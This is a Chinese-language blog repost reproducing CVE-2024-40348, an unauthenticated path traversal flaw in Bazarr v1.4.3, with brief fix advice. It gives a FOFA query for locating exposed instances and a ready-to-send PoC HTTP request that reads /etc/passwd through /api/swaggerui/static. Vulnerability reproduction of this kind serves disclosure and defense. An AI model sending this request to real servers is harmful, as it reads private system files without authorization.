首页 > 基础资料 博客日记
Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348)
2024-08-17 15:00:07基础资料围观148次
本篇文章分享Bazaar v1.4.3 任意文件读取漏洞复现(CVE-2024-40348),对你有帮助的话记得收藏一下,看Java资料网收获更多编程知识
0x01 产品简介
Bazarr是Sonarr和Radarr的配套应用程序,可根据您的要求管理和下载字幕。
0x02 漏洞概述
Bazarr存在任意文件读取漏洞,该漏洞是由于Bazaar v1.4.3的组件/api/swaggerui/static中存在一个问题,允许未经身份验证的攻击者可利用该漏洞执行目录遍历。
0x03 复现环境
FOFA:title="Bazarr"
0x04 漏洞复现
PoC
GET /api/swaggerui/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
文章来源:https://blog.csdn.net/qq_41904294/article/details/140699245
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:jacktools123@163.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:jacktools123@163.com进行投诉反馈,一经查实,立即删除!
标签: